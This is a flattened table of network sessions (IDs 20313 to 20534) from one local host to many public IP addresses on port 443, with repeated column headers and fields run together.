                                      20313192.168.2.1449590160.108.42.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20314192.168.2.145610675.141.191.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20315192.168.2.1450786135.157.21.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20316192.168.2.1448044193.155.145.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20317192.168.2.1452080209.207.229.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20318192.168.2.145678813.60.148.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20319192.168.2.1449636177.201.30.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20320192.168.2.1447754182.46.149.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20321192.168.2.14451761.166.46.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20322192.168.2.143302046.44.115.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20323192.168.2.1446600138.172.148.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20324192.168.2.1455720174.107.101.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20325192.168.2.144557083.154.5.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20326192.168.2.143546489.245.45.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20327192.168.2.1438726113.14.210.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20328192.168.2.143968635.155.65.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20329192.168.2.1459526168.204.248.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20330192.168.2.1453978142.44.126.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20331192.168.2.143491075.77.225.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20332192.168.2.144539225.93.19.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20333192.168.2.1437138222.135.181.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20334192.168.2.144091419.96.40.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20335192.168.2.1455230118.151.76.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20336192.168.2.145544468.153.166.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20337192.168.2.1453574154.109.50.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20338192.168.2.145628493.6.14.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20339192.168.2.143663695.232.54.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20340192.168.2.1448068122.168.168.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20341192.168.2.1448940119.211.75.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20342192.168.2.1460598201.196.66.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20343192.168.2.1434178134.74.41.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20344192.168.2.1452514139.103.6.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20345192.168.2.1433032130.127.158.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20346192.168.2.1460762137.157.39.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20347192.168.2.144883443.111.198.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20348192.168.2.145724683.54.195.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20349192.168.2.1459588183.136.100.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20350192.168.2.1454530144.3.17.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20351192.168.2.144798254.242.22.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20352192.168.2.143499881.25.73.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20353192.168.2.1459618143.140.1.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20354192.168.2.1439340163.150.127.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20355192.168.2.144704620.151.35.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20356192.168.2.1450580164.71.189.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20357192.168.2.143325439.184.228.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20358192.168.2.144785078.156.30.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20359192.168.2.145164658.78.217.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20360192.168.2.143800624.241.179.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20361192.168.2.144789897.40.205.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20362192.168.2.1443776143.14.229.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20363192.168.2.1440838100.221.88.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20364192.168.2.143931883.215.147.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20365192.168.2.1439304203.164.153.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20366192.168.2.1450962149.60.141.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20367192.168.2.1434838147.7.250.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20368192.168.2.144670440.51.99.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20369192.168.2.1446756162.50.143.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20370192.168.2.143818096.0.220.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20371192.168.2.1437048108.223.129.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20372192.168.2.1460790102.28.253.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20373192.168.2.1443836211.235.223.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20374192.168.2.1436942121.48.22.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20375192.168.2.1456312105.12.188.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20376192.168.2.145031680.76.223.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20377192.168.2.1435998174.44.63.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20378192.168.2.144871657.117.42.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20379192.168.2.1449710131.240.72.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20380192.168.2.1460576147.230.251.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20381192.168.2.145193480.9.101.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20382192.168.2.1439424161.216.141.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20383192.168.2.146079476.144.172.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20384192.168.2.1446234170.78.131.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20385192.168.2.1435934143.132.251.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20386192.168.2.1435954177.43.214.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20387192.168.2.1439416180.70.112.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20388192.168.2.1442550104.0.167.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20389192.168.2.1439340193.207.122.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20390192.168.2.1456326201.0.111.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20391192.168.2.143518239.247.253.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20392192.168.2.143533443.72.22.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20393192.168.2.145904048.37.175.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20394192.168.2.1453052184.54.182.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20395192.168.2.144168098.210.125.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20396192.168.2.144435048.80.210.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20397192.168.2.144123032.132.217.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20398192.168.2.1434146134.249.77.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20399192.168.2.1450002110.140.169.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20400192.168.2.1451732159.136.39.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20401192.168.2.145539667.226.170.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20402192.168.2.1445258159.153.141.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20403192.168.2.144899481.117.14.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20404192.168.2.1443140154.143.177.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20405192.168.2.1456434123.232.221.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20406192.168.2.1447482148.246.89.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20407192.168.2.143423075.104.101.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20408192.168.2.1438724136.178.163.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20409192.168.2.143337485.13.0.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20410192.168.2.145627620.225.102.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20411192.168.2.144150484.75.150.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20412192.168.2.1447502222.154.67.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20413192.168.2.1437334130.222.137.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20414192.168.2.143747860.142.153.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20415192.168.2.144509460.138.174.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20416192.168.2.1452160165.136.207.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20417192.168.2.1441514187.200.90.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20418192.168.2.145229273.49.200.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20419192.168.2.1444728220.224.75.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20420192.168.2.145259273.97.102.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20421192.168.2.1437448120.197.221.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20422192.168.2.1454070154.129.69.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20423192.168.2.143810464.190.60.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20424192.168.2.1433166140.22.171.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20425192.168.2.146029064.167.9.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20426192.168.2.145324864.105.165.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20427192.168.2.143964818.48.181.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20428192.168.2.143652412.74.253.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20429192.168.2.1454950171.23.246.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20430192.168.2.146011261.165.35.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20431192.168.2.1440650209.132.127.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20432192.168.2.1436300150.42.85.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20433192.168.2.1451530187.170.134.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20434192.168.2.145050089.63.120.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20435192.168.2.144111834.30.245.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20436192.168.2.1438694156.107.73.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20437192.168.2.143817039.120.138.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20438192.168.2.1442128142.61.171.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20439192.168.2.1443788201.26.189.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20440192.168.2.1448474134.210.232.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20441192.168.2.1460762176.159.246.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20442192.168.2.1435042141.177.92.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20443192.168.2.1438398126.41.73.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20444192.168.2.1445554211.226.60.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20445192.168.2.145772665.16.193.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20446192.168.2.1451970219.154.30.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20447192.168.2.1451992129.181.82.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20448192.168.2.14561108.79.223.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20449192.168.2.1459918206.220.76.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20450192.168.2.143757036.170.140.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20451192.168.2.145689693.192.70.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20452192.168.2.143460899.8.216.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20453192.168.2.146076017.24.22.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20454192.168.2.1438372158.81.140.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20455192.168.2.1433366190.104.48.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20456192.168.2.144818848.75.236.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20457192.168.2.144615284.107.111.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20458192.168.2.1441468147.241.233.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20459192.168.2.1444842151.132.205.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20460192.168.2.1452316163.255.214.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20461192.168.2.145287827.181.137.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20462192.168.2.1447196219.135.75.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20463192.168.2.1445922101.247.236.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20464192.168.2.145253072.70.176.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20465192.168.2.1453682168.134.186.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20466192.168.2.144727850.123.40.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20467192.168.2.145361218.91.140.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20468192.168.2.1449610220.17.180.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20469192.168.2.1436476182.166.1.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20470192.168.2.1442946156.106.187.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20471192.168.2.1457296126.117.186.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20472192.168.2.1445984184.150.234.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20473192.168.2.1437738191.29.50.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20474192.168.2.1459944158.213.84.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20475192.168.2.1448770101.21.30.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20476192.168.2.1448576160.185.168.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20477192.168.2.1434880162.214.207.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20478192.168.2.144498813.245.126.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20479192.168.2.143818890.143.219.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20480192.168.2.1439856181.147.224.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20481192.168.2.1442114167.76.165.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20482192.168.2.1453872156.82.8.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20483192.168.2.144947251.209.87.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20484192.168.2.143515241.43.9.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20485192.168.2.145887844.237.176.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20486192.168.2.1441108123.73.247.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20487192.168.2.145495640.222.219.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20488192.168.2.1443380218.236.101.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20489192.168.2.143584259.164.211.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20490192.168.2.1453332210.144.125.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20491192.168.2.144857048.40.194.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20492192.168.2.1435238201.250.214.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20493192.168.2.143480893.155.116.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20494192.168.2.1442828124.53.143.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20495192.168.2.1441540174.170.164.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20496192.168.2.1443138117.164.32.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20497192.168.2.1457010103.149.104.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20498192.168.2.145405253.17.22.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20499192.168.2.14376722.17.141.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20500192.168.2.145073818.135.147.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20501192.168.2.143628427.5.225.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20502192.168.2.144842869.85.158.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20503192.168.2.144137299.243.143.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20504192.168.2.1450640193.182.175.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20505192.168.2.1447370123.139.218.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20506192.168.2.1454710119.147.46.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20507192.168.2.1460804107.131.38.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20508192.168.2.1433156110.44.205.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20509192.168.2.1434114182.127.51.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20510192.168.2.1451632123.15.73.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20511192.168.2.1444618177.204.58.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20512192.168.2.143696698.232.162.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20513192.168.2.1439424176.157.191.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20514192.168.2.145866634.254.137.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20515192.168.2.1449122182.85.36.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20516192.168.2.145374250.54.201.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20517192.168.2.145197677.179.124.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20518192.168.2.145687286.204.216.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20519192.168.2.145513459.65.179.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20520192.168.2.1445214134.34.190.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20521192.168.2.1457816156.169.32.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20522192.168.2.1435486216.233.205.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20523192.168.2.1437468153.252.200.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20524192.168.2.146077677.57.226.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20525192.168.2.145207658.174.186.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20526192.168.2.1451674143.191.105.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20527192.168.2.1449080145.170.180.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20528192.168.2.1447370187.15.56.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20529192.168.2.1432986175.146.212.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20530192.168.2.1448956132.18.44.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20531192.168.2.145338214.48.65.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20532192.168.2.1454612223.132.97.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20533192.168.2.1439794207.159.53.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20534192.168.2.1437246217.166.188.186443
                                      TimestampBytes transferredDirectionData


